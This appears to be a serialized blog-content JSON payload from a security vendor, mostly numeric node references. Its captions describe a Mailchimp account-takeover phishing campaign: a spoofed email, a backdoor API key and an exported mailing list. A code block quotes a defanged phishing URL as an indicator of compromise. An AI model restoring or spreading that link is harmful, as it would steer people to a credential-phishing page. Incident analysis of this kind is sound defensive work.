s":133597,"data":133598},[],{},{"nodeType":312,"data":133600,"content":133603},{"target":133601},{"sys":133602},{"id":121691,"type":317,"linkType":318},[],{"nodeType":312,"data":133605,"content":133608},{"target":133606},{"sys":133607},{"id":121697,"type":317,"linkType":318},[],{"nodeType":178,"data":133610,"content":133611},{},[133612],{"nodeType":173,"value":121703,"marks":133613,"data":133614},[],{},{"nodeType":178,"data":133616,"content":133617},{},[133618,133621,133628],{"nodeType":173,"value":121710,"marks":133619,"data":133620},[],{},{"nodeType":186,"data":133622,"content":133623},{"uri":832},[133624],{"nodeType":173,"value":4519,"marks":133625,"data":133627},[133626],{"type":194},{},{"nodeType":173,"value":53584,"marks":133629,"data":133630},[],{},{"nodeType":312,"data":133632,"content":133635},{"target":133633},{"sys":133634},{"id":121727,"type":317,"linkType":318},[],{"nodeType":178,"data":133637,"content":133638},{},[133639],{"nodeType":173,"value":121733,"marks":133640,"data":133641},[],{},{"nodeType":231,"data":133643,"content":133644},{},[],{"nodeType":169,"data":133646,"content":133647},{},[133648],{"nodeType":173,"value":121743,"marks":133649,"data":133651},[133650],{"type":370},{},{"nodeType":178,"data":133653,"content":133654},{},[133655,133658,133665],{"nodeType":173,"value":121751,"marks":133656,"data":133657},[],{},{"nodeType":186,"data":133659,"content":133660},{"uri":97747},[133661],{"nodeType":173,"value":121758,"marks":133662,"data":133664},[133663],{"type":194},{},{"nodeType":173,"value":121763,"marks":133666,"data":133667},[],{},{"nodeType":250,"data":133669,"content":133670},{},[133671,133680],{"nodeType":254,"data":133672,"content":133673},{},[133674],{"nodeType":178,"data":133675,"content":133676},{},[133677],{"nodeType":173,"value":121776,"marks":133678,"data":133679},[],{},{"nodeType":254,"data":133681,"content":133682},{},[133683],{"nodeType":178,"data":133684,"content":133685},{},[133686],{"nodeType":173,"value":121786,"marks":133687,"data":133688},[],{},{"nodeType":178,"data":133690,"content":133691},{},[133692],{"nodeType":173,"value":121793,"marks":133693,"data":133694},[],{},{"nodeType":235,"data":133696,"content":133697},{},[133698],{"nodeType":173,"value":121800,"marks":133699,"data":133701},[133700],{"type":370},{},{"nodeType":178,"data":133703,"content":133704},{},[133705],{"nodeType":173,"value":121808,"marks":133706,"data":133707},[],{},{"nodeType":178,"data":133709,"content":133710},{},[133711],{"nodeType":173,"value":121815,"marks":133712,"data":133713},[],{},{"nodeType":312,"data":133715,"content":133718},{"target":133716},{"sys":133717},{"id":121822,"type":317,"linkType":318},[],{"nodeType":235,"data":133720,"content":133721},{},[133722],{"nodeType":173,"value":121828,"marks":133723,"data":133725},[133724],{"type":370},{},{"nodeType":178,"data":133727,"content":133728},{},[133729,133732,133739],{"nodeType":173,"value":121836,"marks":133730,"data":133731},[],{},{"nodeType":186,"data":133733,"content":133734},{"uri":74693},[133735],{"nodeType":173,"value":121843,"marks":133736,"data":133738},[133737],{"type":194},{},{"nodeType":173,"value":121848,"marks":133740,"data":133741},[],{},{"nodeType":178,"data":133743,"content":133744},{},[133745,133748,133755],{"nodeType":173,"value":121855,"marks":133746,"data":133747},[],{},{"nodeType":186,"data":133749,"content":133750},{"uri":74693},[133751],{"nodeType":173,"value":121862,"marks":133752,"data":133754},[133753],{"type":194},{},{"nodeType":173,"value":121867,"marks":133756,"data":133757},[],{},{"nodeType":312,"data":133759,"content":133762},{"target":133760},{"sys":133761},{"id":121874,"type":317,"linkType":318},[],{"nodeType":178,"data":133764,"content":133765},{},[133766],{"nodeType":173,"value":121880,"marks":133767,"data":133768},[],{},{"nodeType":312,"data":133770,"content":133773},{"target":133771},{"sys":133772},{"id":121887,"type":317,"linkType":318},[],{"nodeType":235,"data":133775,"content":133776},{},[133777],{"nodeType":173,"value":121893,"marks":133778,"data":133780},[133779],{"type":370},{},{"nodeType":178,"data":133782,"content":133783},{},[133784,133787,133794,133797,133804],{"nodeType":173,"value":121901,"marks":133785,"data":133786},[],{},{"nodeType":186,"data":133788,"content":133789},{"uri":121906},[133790],{"nodeType":173,"value":121909,"marks":133791,"data":133793},[133792],{"type":194},{},{"nodeType":173,"value":121914,"marks":133795,"data":133796},[],{},{"nodeType":186,"data":133798,"content":133799},{"uri":88239},[133800],{"nodeType":173,"value":121921,"marks":133801,"data":133803},[133802],{"type":194},{},{"nodeType":173,"value":121926,"marks":133805,"data":133806},[],{},{"nodeType":312,"data":133808,"content":133811},{"target":133809},{"sys":133810},{"id":121933,"type":317,"linkType":318},[],{"nodeType":178,"data":133813,"content":133814},{},[133815],{"nodeType":173,"value":121939,"marks":133816,"data":133817},[],{},{"nodeType":231,"data":133819,"content":133820},{},[],{"nodeType":169,"data":133822,"content":133823},{},[133824],{"nodeType":173,"value":121949,"marks":133825,"data":133827},[133826],{"type":370},{},{"nodeType":178,"data":133829,"content":133830},{},[133831],{"nodeType":173,"value":121957,"marks":133832,"data":133833},[],{},{"nodeType":178,"data":133835,"content":133836},{},[133837,133840,133847],{"nodeType":173,"value":121964,"marks":133838,"data":133839},[],{},{"nodeType":186,"data":133841,"content":133842},{"uri":121969},[133843],{"nodeType":173,"value":121972,"marks":133844,"data":133846},[133845],{"type":194},{},{"nodeType":173,"value":121977,"marks":133848,"data":133849},[],{},{"nodeType":178,"data":133851,"content":133852},{},[133853],{"nodeType":173,"value":121984,"marks":133854,"data":133855},[],{},{"nodeType":312,"data":133857,"content":133860},{"target":133858},{"sys":133859},{"id":121991,"type":317,"linkType":318},[],{"nodeType":235,"data":133862,"content":133863},{},[133864],{"nodeType":173,"value":121997,"marks":133865,"data":133867},[133866],{"type":370},{},{"nodeType":178,"data":133869,"content":133870},{},[133871],{"nodeType":173,"value":122005,"marks":133872,"data":133873},[],{},{"nodeType":178,"data":133875,"content":133876},{},[133877],{"nodeType":173,"value":122012,"marks":133878,"data":133879},[],{},{"nodeType":178,"data":133881,"content":133882},{},[133883],{"nodeType":173,"value":122019,"marks":133884,"data":133885},[],{},{"nodeType":178,"data":133887,"content":133888},{},[133889],{"nodeType":173,"value":122026,"marks":133890,"data":133891},[],{},{"nodeType":250,"data":133893,"content":133894},{},[133895,133924,133943],{"nodeType":254,"data":133896,"content":133897},{},[133898],{"nodeType":178,"data":133899,"content":133900},{},[133901,133904,133911,133914,133921],{"nodeType":173,"value":122039,"marks":133902,"data":133903},[],{},{"nodeType":186,"data":133905,"content":133906},{"uri":819},[133907],{"nodeType":173,"value":27706,"marks":133908,"data":133910},[133909],{"type":194},{},{"nodeType":173,"value":122050,"marks":133912,"data":133913},[],{},{"nodeType":186,"data":133915,"content":133916},{"uri":27726},[133917],{"nodeType":173,"value":27729,"marks":133918,"data":133920},[133919],{"type":194},{},{"nodeType":173,"value":122061,"marks":133922,"data":133923},[],{},{"nodeType":254,"data":133925,"content":133926},{},[133927],{"nodeType":178,"data":133928,"content":133929},{},[133930,133933,133940],{"nodeType":173,"value":122071,"marks":133931,"data":133932},[],{},{"nodeType":186,"data":133934,"content":133935},{"uri":122076},[133936],{"nodeType":173,"value":122079,"marks":133937,"data":133939},[133938],{"type":194},{},{"nodeType":173,"value":122084,"marks":133941,"data":133942},[],{},{"nodeType":254,"data":133944,"content":133945},{},[133946],{"nodeType":178,"data":133947,"content":133948},{},[133949],{"nodeType":173,"value":122094,"marks":133950,"data":133951},[],{},{"nodeType":178,"data":133953,"content":133954},{},[133955],{"nodeType":173,"value":122101,"marks":133956,"data":133957},[],{},{"nodeType":235,"data":133959,"content":133960},{},[133961],{"nodeType":173,"value":122108,"marks":133962,"data":133964},[133963],{"type":370},{},{"nodeType":178,"data":133966,"content":133967},{},[133968,133971,133977],{"nodeType":173,"value":122116,"marks":133969,"data":133970},[],{},{"nodeType":186,"data":133972,"content":133973},{"uri":122121},[133974],{"nodeType":173,"value":122124,"marks":133975,"data":133976},[],{},{"nodeType":173,"value":122128,"marks":133978,"data":133979},[],{},{"nodeType":312,"data":133981,"content":133984},{"target":133982},{"sys":133983},{"id":122135,"type":317,"linkType":318},[],{"nodeType":178,"data":133986,"content":133987},{},[133988],{"nodeType":173,"value":122141,"marks":133989,"data":133990},[],{},{"nodeType":178,"data":133992,"content":133993},{},[133994],{"nodeType":173,"value":122148,"marks":133995,"data":133996},[],{},{"nodeType":312,"data":133998,"content":134001},{"target":133999},{"sys":134000},{"id":122155,"type":317,"linkType":318},[],{"nodeType":178,"data":134003,"content":134004},{},[134005],{"nodeType":173,"value":122161,"marks":134006,"data":134007},[],{},{"nodeType":312,"data":134009,"content":134012},{"target":134010},{"sys":134011},{"id":122168,"type":317,"linkType":318},[],{"nodeType":235,"data":134014,"content":134015},{},[134016],{"nodeType":173,"value":122174,"marks":134017,"data":134019},[134018],{"type":370},{},{"nodeType":178,"data":134021,"content":134022},{},[134023],{"nodeType":173,"value":122182,"marks":134024,"data":134025},[],{},{"nodeType":312,"data":134027,"content":134030},{"target":134028},{"sys":134029},{"id":122189,"type":317,"linkType":318},[],{"nodeType":312,"data":134032,"content":134035},{"target":134033},{"sys":134034},{"id":122195,"type":317,"linkType":318},[],{"nodeType":178,"data":134037,"content":134038},{},[134039],{"nodeType":173,"value":122201,"marks":134040,"data":134041},[],{},{"nodeType":231,"data":134043,"content":134044},{},[],{"nodeType":169,"data":134046,"content":134047},{},[134048],{"nodeType":173,"value":16139,"marks":134049,"data":134051},[134050],{"type":370},{},{"nodeType":178,"data":134053,"content":134054},{},[134055,134058,134065,134068,134075],{"nodeType":173,"value":122218,"marks":134056,"data":134057},[],{},{"nodeType":186,"data":134059,"content":134060},{"uri":88239},[134061],{"nodeType":173,"value":88245,"marks":134062,"data":134064},[134063],{"type":194},{},{"nodeType":173,"value":933,"marks":134066,"data":134067},[],{},{"nodeType":186,"data":134069,"content":134070},{"uri":122233},[134071],{"nodeType":173,"value":122236,"marks":134072,"data":134074},[134073],{"type":194},{},{"nodeType":173,"value":122241,"marks":134076,"data":134077},[],{},{"nodeType":178,"data":134079,"content":134080},{},[134081],{"nodeType":173,"value":122248,"marks":134082,"data":134083},[],{},{"nodeType":178,"data":134085,"content":134086},{},[134087,134090,134097],{"nodeType":173,"value":122255,"marks":134088,"data":134089},[],{},{"nodeType":186,"data":134091,"content":134092},{"uri":81621},[134093],{"nodeType":173,"value":122262,"marks":134094,"data":134096},[134095],{"type":194},{},{"nodeType":173,"value":122267,"marks":134098,"data":134099},[],{},{"nodeType":178,"data":134101,"content":134102},{},[134103],{"nodeType":173,"value":122274,"marks":134104,"data":134105},[],{},{"nodeType":3769,"data":134107,"content":134108},{},[134109],{"nodeType":178,"data":134110,"content":134111},{},[134112],{"nodeType":173,"value":122284,"marks":134113,"data":134115},[134114],{"type":370},{},{"nodeType":178,"data":134117,"content":134118},{},[134119],{"nodeType":173,"value":122292,"marks":134120,"data":134121},[],{},{"nodeType":231,"data":134123,"content":134124},{},[],{"nodeType":169,"data":134126,"content":134127},{},[134128],{"nodeType":173,"value":1422,"marks":134129,"data":134131},[134130],{"type":370},{},{"nodeType":178,"data":134133,"content":134134},{},[134135,134138,134145],{"nodeType":173,"value":122309,"marks":134136,"data":134137},[],{},{"nodeType":186,"data":134139,"content":134140},{"uri":122314},[134141],{"nodeType":173,"value":122317,"marks":134142,"data":134144},[134143],{"type":194},{},{"nodeType":173,"value":197,"marks":134146,"data":134147},[],{},{"nodeType":178,"data":134149,"content":134150},{},[134151,134154,134161],{"nodeType":173,"value":122328,"marks":134152,"data":134153},[],{},{"nodeType":186,"data":134155,"content":134156},{"uri":473},[134157],{"nodeType":173,"value":2889,"marks":134158,"data":134160},[134159],{"type":194},{},{"nodeType":173,"value":1477,"marks":134162,"data":134163},[],{},{"entries":134165},{"hyperlink":134166,"inline":134167,"block":134168},[],[],[134169,134176,134184,134210,134217,134222,134227,134234,134240,134247,134253,134261,134265,134272],{"sys":134170,"__typename":5345,"title":134171,"caption":134172,"layoutMode":118,"file":134173},{"id":121678},"Mailchimp phishing email","Phishing email mimicking the design of MailChimp emails. ",{"url":132265,"width":134174,"height":134175},1216,1473,{"sys":134177,"__typename":5345,"title":134178,"caption":134179,"layoutMode":118,"file":134180},{"id":121691},"Mailchimp blog image 2","The sender address is from a custom domain that doesn't match MailChimp.",{"url":134181,"width":134182,"height":134183},"https://images.ctfassets.net/y1cdw1ablpvd/13as7RS1LRKBQYUVsrfaEq/ffd3dac7a39db009ba5f93e4b448a752/image3.png",450,118,{"sys":134185,"__typename":5311,"content":134186,"name":134209,"title":118},{"id":121697},{"json":134187},{"data":134188,"content":134189,"nodeType":165},{},[134190],{"data":134191,"content":134192,"nodeType":178},{},[134193,134197,134206],{"data":134194,"marks":134195,"value":134196,"nodeType":173},{},[],"It’s notable that this email wasn’t actually sent from MailChimp as we’ve seen with other recent attacks where attackers have used third-party SaaS services to send their emails, making them appear more legitimate (such as in ",{"data":134198,"content":134200,"nodeType":186},{"uri":134199},"https://thehackernews.com/2024/12/hubphish-exploits-hubspot-tools-to.html",[134201],{"data":134202,"marks":134203,"value":134205,"nodeType":173},{},[134204],{"type":194},"recent campaigns leveraging HubSpot and DocuSign",{"data":134207,"marks":134208,"value":53584,"nodeType":173},{},[],"Mailchimp blog insight box 1",{"sys":134211,"__typename":5345,"title":134212,"caption":134213,"layoutMode":118,"file":134214},{"id":121727},"Mailchimp blog image 3","Suspicious activity notifications sent at 06:59, 07:00, and 07:01 show how quickly the attack was executed.",{"url":134215,"width":5358,"height":134216},"https://images.ctfassets.net/y1cdw1ablpvd/32prbL1kkdUuSHt7iZv0i9/6dc274e7ff9b22993f9e633c04f05dc5/image10.png",352,{"sys":134218,"__typename":5345,"title":134219,"caption":134220,"layoutMode":118,"file":134221},{"id":121822},"Mailchimp blog image 4","The attacker enumerated Troy's dedicated email used for MailChimp.",{"url":134181,"width":134182,"height":134183},{"sys":134223,"__typename":5345,"title":134224,"caption":134225,"layoutMode":118,"file":134226},{"id":121874},"Mailchimp blog image 5","Cloudflare Turnstile is often used to prevent security bots from analysing the attacker's phishing page. ",{"url":123320,"width":123321,"height":123322},{"sys":134228,"__typename":5345,"title":134229,"caption":134230,"layoutMode":118,"file":134231},{"id":121887},"Mailchimp blog image 6","The site is now being flagged as malicious.",{"url":134232,"width":5358,"height":134233},"https://images.ctfassets.net/y1cdw1ablpvd/7pVNsGvPJC1hMGGPuwznYX/e06f3881f8a6fb8742dd9c95068f4f25/image5.png",1540,{"sys":134235,"__typename":5345,"title":134229,"caption":134236,"layoutMode":118,"file":134237},{"id":121933},"The attacker created an API key for backdoor access to the app.",{"url":134238,"width":5358,"height":134239},"https://images.ctfassets.net/y1cdw1ablpvd/4kQE2MpMXV5edYTZ567NpA/45e5c8d26510959dd91440508280b82b/image9.png",333,{"sys":134241,"__typename":5345,"title":134242,"caption":134243,"layoutMode":118,"file":134244},{"id":121991},"Mailchimp blog image 7","Data captured by the attacker from the exported mailing list.",{"url":134245,"width":32178,"height":134246},"https://images.ctfassets.net/y1cdw1ablpvd/1uOXeOFOEglg6Dzv3kPNud/bd6957fef3cfcdffe02e00f3a9f54b49/image8.png",276,{"sys":134248,"__typename":5345,"title":134249,"caption":134250,"layoutMode":118,"file":134251},{"id":122135},"Mailchimp blog image 8","MailChimp only offers 'Continue with Google' as an SSO option.",{"url":134252,"width":5358,"height":46375},"https://images.ctfassets.net/y1cdw1ablpvd/13VC1YYs1ts8aVO6cbaovA/6cdcf47472e267c25625171a6b8e9653/image7.png",{"sys":134254,"__typename":5345,"title":134255,"caption":134256,"layoutMode":118,"file":134257},{"id":122155},"Mailchimp blog image 9","MailChimp only supports phishable MFA factors",{"url":134258,"width":134259,"height":134260},"https://images.ctfassets.net/y1cdw1ablpvd/2FcpNMwmFmmyp1P9NZ9aCx/9e6d9a407d9db243f2f210d39013c731/image6.png",600,410,{"sys":134262,"__typename":15269,"type":15270,"ctaText":134263,"buttonLabel":134264,"buttonColour":15273,"buttonUrl":27564},{"id":122168},"Learn more about the common security gaps created by app developers that contribute to SaaS identity breaches.","Read the blog",{"sys":134266,"__typename":5345,"title":134267,"caption":118,"layoutMode":118,"file":134268},{"id":122189},"Mailchimp blog image 10",{"url":134269,"width":134270,"height":134271},"https://images.ctfassets.net/y1cdw1ablpvd/5nzmVTjx3clYWDr0hlKPu2/aac584ccda7de2c15d704b14ee0d8c6e/image4.png",1400,1620,{"sys":134273,"__typename":134274,"name":134275,"type":134276,"syntax":134277},{"id":122195},"CodeBlockComponent","Mailchimp blog code snippet","shell","hxxps://groupf.emlnk9.com/lt.php?x=3DZy~GE6KXOf6a4s-tI6hRVt3H2piwDuwehiY5THVXeZ5sF_y0y.zOlz5X2gk.~wjvYxZHP","content:blog:dissecting-a-recent-mailchimp-phishing-attack.json","blog/dissecting-a-recent-mailchimp-phishing-attack.json","blog/dissecting-a-recent-mailchimp-phishing-attack",{"_path":134282,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":134283,"summary":134285,"title":46314,"subtitle":118,"metaTitle":134296,"synopsis":112267,"hashTags":118,"publishedDate":77669,"slug":46315,"tagsCollection":134297,"relatedBlogPostsCollection":134303,"ogImage":136161,"authorsCollection":136163,"content":136167,"_id":137068,"_type":5439,"_source":5440,"_file":137069,"_stem":137070,"_extension":5439},"/blog/introducing-strong-password-enforcement",{"id":24759,"publishedAt":134284},"2026-01-30T09:14:57.737Z",{"json":134286},{"data":134287,"content":134288,"nodeType":165},{},[134289],{"data":134290,"content":134291,"nodeType":178},{},[134292],{"data":134293,"marks":134294,"value":134295,"nodeType":173},{},[],"Our latest feature release, strong password enforcement, detects when employees have weak, reused, or stolen passwords and then guides them to update their password using in-browser messaging — even on apps that don’t natively support administrative control of password posture.","Enforce strong passwords at the point of login",{"items":134298},[134299,134301],{"sys":134300,"name":26137},{"id":26136},{"sys":134302,"name":505},{"id":504},{"items":134304},[134305,134913,135613],{"__typename":1528,"sys":134306,"content":134307,"title":46302,"synopsis":77668,"hashTags":118,"publishedDate":77669,"slug":46303,"tagsCollection":134903,"authorsCollection":134909},{"id":24631},{"json":134308},{"nodeType":165,"data":134309,"content":134310},{},[134311,134324,134329,134335,134340,134343,134350,134356,134437,134442,134448,134454,134457,134464,134471,134477,134525,134532,134547,134571,134577,134584,134590,134595,134610,134623,134628,134634,134657,134663,134669,134699,134705,134711,134727,134730,134737,134743,134749,134755,134762,134778,134783,134790,134806,134821,134826,134833,134839,134855,134861,134866,134869,134876,134882,134888],{"nodeType":178,"data":134312,"content":134313},{},[134314,134317,134321],{"nodeType":173,"value":76988,"marks":134315,"data":134316},[],{},{"nodeType":173,"value":76992,"marks":134318,"data":134320},[134319],{"type":370},{},{"nodeType":173,"value":76997,"marks":134322,"data":134323},[],{},{"nodeType":312,"data":134325,"content":134328},{"target":134326},{"sys":134327},{"id":77004,"type":317,"linkType":318},[],{"nodeType":178,"data":134330,"content":134331},{},[134332],{"nodeType":173,"value":37,"marks":134333,"data":134334},[],{},{"nodeType":312,"data":134336,"content":134339},{"target":134337},{"sys":134338},{"id":77016,"type":317,"linkType":318},[],{"nodeType":231,"data":134341,"content":134342},{},[],{"nodeType":169,"data":134344,"content":134345},{},[134346],{"nodeType":173,"value":77025,"marks":134347,"data":134349},[134348],{"type":370},{},{"nodeType":178,"data":134351,"content":134352},{},[134353],{"nodeType":173,"value":77033,"marks":134354,"data":134355},[],{},{"nodeType":250,"data":134357,"content":134358},{},[134359,134372,134385,134398,134411,134424],{"nodeType":254,"data":134360,"content":134361},{},[134362],{"nodeType":178,"data":134363,"content":134364},{},[134365,134369],{"nodeType":173,"value":77046,"marks":134366,"data":134368},[134367],{"type":370},{},{"nodeType":173,"value":77051,"marks":134370,"data":134371},[],{},{"nodeType":254,"data":134373,"content":134374},{},[134375],{"nodeType":178,"data":134376,"content":134377},{},[134378,134382],{"nodeType":173,"value":77061,"marks":134379,"data":134381},[134380],{"type":370},{},{"nodeType":173,"value":77066,"marks":134383,"data":134384},[],{},{"nodeType":254,"data":134386,"content":134387},{},[134388],{"nodeType":178,"data":134389,"content":134390},{},[134391,134395],{"nodeType":173,"value":77076,"marks":134392,"data":134394},[134393],{"type":370},{},{"nodeType":173,"value":77081,"marks":134396,"data":134397},[],{},{"nodeType":254,"data":134399,"content":134400},{},[134401],{"nodeType":178,"data":134402,"content":134403},{},[134404,134408],{"nodeType":173,"value":77091,"marks":134405,"data":134407},[134406],{"type":370},{},{"nodeType":173,"value":77096,"marks":134409,"data":134410},[],{},{"nodeType":254,"data":134412,"content":134413},{},[134414],{"nodeType":178,"data":134415,"content":134416},{},[134417,134421],{"nodeType":173,"value":77106,"marks":134418,"data":134420},[134419],{"type":370},{},{"nodeType":173,"value":77111,"marks":134422,"data":134423},[],{},{"nodeType":254,"data":134425,"content":134426},{},[134427],{"nodeType":178,"data":134428,"content":134429},{},[134430,134434],{"nodeType":173,"value":77121,"marks":134431,"data":134433},[134432],{"type":370},{},{"nodeType":173,"value":77126,"marks":134435,"data":134436},[],{},{"nodeType":312,"data":134438,"content":134441},{"target":134439},{"sys":134440},{"id":77133,"type":317,"linkType":318},[],{"nodeType":178,"data":134443,"content":134444},{},[134445],{"nodeType":173,"value":77139,"marks":134446,"data":134447},[],{},{"nodeType":178,"data":134449,"content":134450},{},[134451],{"nodeType":173,"value":77146,"marks":134452,"data":134453},[],{},{"nodeType":231,"data":134455,"content":134456},{},[],{"nodeType":169,"data":134458,"content":134459},{},[134460],{"nodeType":173,"value":77156,"marks":134461,"data":134463},[134462],{"type":370},{},{"nodeType":235,"data":134465,"content":134466},{},[134467],{"nodeType":173,"value":77164,"marks":134468,"data":134470},[134469],{"type":370},{},{"nodeType":178,"data":134472,"content":134473},{},[134474],{"nodeType":173,"value":77172,"marks":134475,"data":134476},[],{},{"nodeType":250,"data":134478,"content":134479},{},[134480,134489,134498,134507,134516],{"nodeType":254,"data":134481,"content":134482},{},[134483],{"nodeType":178,"data":134484,"content":134485},{},[134486],{"nodeType":173,"value":77185,"marks":134487,"data":134488},[],{},{"nodeType":254,"data":134490,"content":134491},{},[134492],{"nodeType":178,"data":134493,"content":134494},{},[134495],{"nodeType":173,"value":77195,"marks":134496,"data":134497},[],{},{"nodeType":254,"data":134499,"content":134500},{},[134501],{"nodeType":178,"data":134502,"content":134503},{},[134504],{"nodeType":173,"value":77205,"marks":134505,"data":134506},[],{},{"nodeType":254,"data":134508,"content":134509},{},[134510],{"nodeType":178,"data":134511,"content":134512},{},[134513],{"nodeType":173,"value":77215,"marks":134514,"data":134515},[],{},{"nodeType":254,"data":134517,"content":134518},{},[134519],{"nodeType":178,"data":134520,"content":134521},{},[134522],{"nodeType":173,"value":77225,"marks":134523,"data":134524},[],{},{"nodeType":235,"data":134526,"content":134527},{},[134528],{"nodeType":173,"value":77232,"marks":134529,"data":134531},[134530],{"type":370},{},{"nodeType":178,"data":134533,"content":134534},{},[134535,134538,134544],{"nodeType":173,"value":37,"marks":134536,"data":134537},[],{},{"nodeType":186,"data":134539,"content":134540},{"uri":1297},[134541],{"nodeType":173,"value":77246,"marks":134542,"data":134543},[],{},{"nodeType":173,"value":77250,"marks":134545,"data":134546},[],{},{"nodeType":178,"data":134548,"content":134549},{},[134550,134553,134559,134562,134568],{"nodeType":173,"value":77257,"marks":134551,"data":134552},[],{},{"nodeType":186,"data":134554,"content":134555},{"uri":77262},[134556],{"nodeType":173,"value":77265,"marks":134557,"data":134558},[],{},{"nodeType":173,"value":77269,"marks":134560,"data":134561},[],{},{"nodeType":186,"data":134563,"content":134564},{"uri":819},[134565],{"nodeType":173,"value":27706,"marks":134566,"data":134567},[],{},{"nodeType":173,"value":77279,"marks":134569,"data":134570},[],{},{"nodeType":178,"data":134572,"content":134573},{},[134574],{"nodeType":173,"value":77286,"marks":134575,"data":134576},[],{},{"nodeType":235,"data":134578,"content":134579},{},[134580],{"nodeType":173,"value":77293,"marks":134581,"data":134583},[134582],{"type":370},{},{"nodeType":178,"data":134585,"content":134586},{},[134587],{"nodeType":173,"value":77301,"marks":134588,"data":134589},[],{},{"nodeType":312,"data":134591,"content":134594},{"target":134592},{"sys":134593},{"id":77308,"type":317,"linkType":318},[],{"nodeType":178,"data":134596,"content":134597},{},[134598,134601,134607],{"nodeType":173,"value":77314,"marks":134599,"data":134600},[],{},{"nodeType":186,"data":134602,"content":134603},{"uri":77319},[134604],{"nodeType":173,"value":77322,"marks":134605,"data":134606},[],{},{"nodeType":173,"value":77326,"marks":134608,"data":134609},[],{},{"nodeType":178,"data":134611,"content":134612},{},[134613,134616,134620],{"nodeType":173,"value":77333,"marks":134614,"data":134615},[],{},{"nodeType":173,"value":77337,"marks":134617,"data":134619},[134618],{"type":370},{},{"nodeType":173,"value":77342,"marks":134621,"data":134622},[],{},{"nodeType":312,"data":134624,"content":134627},{"target":134625},{"sys":134626},{"id":77349,"type":317,"linkType":318},[],{"nodeType":178,"data":134629,"content":134630},{},[134631],{"nodeType":173,"value":77355,"marks":134632,"data":134633},[],{},{"nodeType":178,"data":134635,"content":134636},{},[134637,134640,134647,134650,134654],{"nodeType":173,"value":37,"marks":134638,"data":134639},[],{},{"nodeType":186,"data":134641,"content":134642},{"uri":4492},[134643],{"nodeType":173,"value":77368,"marks":134644,"data":134646},[134645],{"type":194},{},{"nodeType":173,"value":77373,"marks":134648,"data":134649},[],{},{"nodeType":173,"value":77377,"marks":134651,"data":134653},[134652],{"type":370},{},{"nodeType":173,"value":197,"marks":134655,"data":134656},[],{},{"nodeType":169,"data":134658,"content":134659},{},[134660],{"nodeType":173,"value":77388,"marks":134661,"data":134662},[],{},{"nodeType":178,"data":134664,"content":134665},{},[134666],{"nodeType":173,"value":77395,"marks":134667,"data":134668},[],{},{"nodeType":250,"data":134670,"content":134671},{},[134672,134681,134690],{"nodeType":254,"data":134673,"content":134674},{},[134675],{"nodeType":178,"data":134676,"content":134677},{},[134678],{"nodeType":173,"value":77408,"marks":134679,"data":134680},[],{},{"nodeType":254,"data":134682,"content":134683},{},[134684],{"nodeType":178,"data":134685,"content":134686},{},[134687],{"nodeType":173,"value":77418,"marks":134688,"data":134689},[],{},{"nodeType":254,"data":134691,"content":134692},{},[134693],{"nodeType":178,"data":134694,"content":134695},{},[134696],{"nodeType":173,"value":77428,"marks":134697,"data":134698},[],{},{"nodeType":178,"data":134700,"content":134701},{},[134702],{"nodeType":173,"value":77435,"marks":134703,"data":134704},[],{},{"nodeType":178,"data":134706,"content":134707},{},[134708],{"nodeType":173,"value":77442,"marks":134709,"data":134710},[],{},{"nodeType":178,"data":134712,"content":134713},{},[134714,134717,134724],{"nodeType":173,"value":77449,"marks":134715,"data":134716},[],{},{"nodeType":186,"data":134718,"content":134719},{"uri":62639},[134720],{"nodeType":173,"value":77456,"marks":134721,"data":134723},[134722],{"type":194},{},{"nodeType":173,"value":77461,"marks":134725,"data":134726},[],{},{"nodeType":231,"data":134728,"content":134729},{},[],{"nodeType":169,"data":134731,"content":134732},{},[134733],{"nodeType":173,"value":77471,"marks":134734,"data":134736},[134735],{"type":370},{},{"nodeType":178,"data":134738,"content":134739},{},[134740],{"nodeType":173,"value":77479,"marks":134741,"data":134742},[],{},{"nodeType":178,"data":134744,"content":134745},{},[134746],{"nodeType":173,"value":77486,"marks":134747,"data":134748},[],{},{"nodeType":178,"data":134750,"content":134751},{},[134752],{"nodeType":173,"value":77493,"marks":134753,"data":134754},[],{},{"nodeType":235,"data":134756,"content":134757},{},[134758],{"nodeType":173,"value":77500,"marks":134759,"data":134761},[134760],{"type":370},{},{"nodeType":178,"data":134763,"content":134764},{},[134765,134768,134775],{"nodeType":173,"value":77508,"marks":134766,"data":134767},[],{},{"nodeType":186,"data":134769,"content":134770},{"uri":77513},[134771],{"nodeType":173,"value":77516,"marks":134772,"data":134774},[134773],{"type":194},{},{"nodeType":173,"value":77521,"marks":134776,"data":134777},[],{},{"nodeType":312,"data":134779,"content":134782},{"target":134780},{"sys":134781},{"id":71649,"type":317,"linkType":318},[],{"nodeType":235,"data":134784,"content":134785},{},[134786],{"nodeType":173,"value":77533,"marks":134787,"data":134789},[134788],{"type":370},{},{"nodeType":178,"data":134791,"content":134792},{},[134793,134796,134803],{"nodeType":173,"value":77541,"marks":134794,"data":134795},[],{},{"nodeType":186,"data":134797,"content":134798},{"uri":62639},[134799],{"nodeType":173,"value":77548,"marks":134800,"data":134802},[134801],{"type":194},{},{"nodeType":173,"value":77553,"marks":134804,"data":134805},[],{},{"nodeType":178,"data":134807,"content":134808},{},[134809,134812,134818],{"nodeType":173,"value":77560,"marks":134810,"data":134811},[],{},{"nodeType":186,"data":134813,"content":134814},{"uri":77565},[134815],{"nodeType":173,"value":77568,"marks":134816,"data":134817},[],{},{"nodeType":173,"value":197,"marks":134819,"data":134820},[],{},{"nodeType":312,"data":134822,"content":134825},{"target":134823},{"sys":134824},{"id":77578,"type":317,"linkType":318},[],{"nodeType":235,"data":134827,"content":134828},{},[134829],{"nodeType":173,"value":77584,"marks":134830,"data":134832},[134831],{"type":370},{},{"nodeType":178,"data":134834,"content":134835},{},[134836],{"nodeType":173,"value":77592,"marks":134837,"data":134838},[],{},{"nodeType":178,"data":134840,"content":134841},{},[134842,134845,134852],{"nodeType":173,"value":77599,"marks":134843,"data":134844},[],{},{"nodeType":186,"data":134846,"content":134847},{"uri":4342},[134848],{"nodeType":173,"value":4519,"marks":134849,"data":134851},[134850],{"type":194},{},{"nodeType":173,"value":77610,"marks":134853,"data":134854},[],{},{"nodeType":178,"data":134856,"content":134857},{},[134858],{"nodeType":173,"value":77617,"marks":134859,"data":134860},[],{},{"nodeType":312,"data":134862,"content":134865},{"target":134863},{"sys":134864},{"id":77624,"type":317,"linkType":318},[],{"nodeType":231,"data":134867,"content":134868},{},[],{"nodeType":169,"data":134870,"content":134871},{},[134872],{"nodeType":173,"value":77633,"marks":134873,"data":134875},[134874],{"type":370},{},{"nodeType":178,"data":134877,"content":134878},{}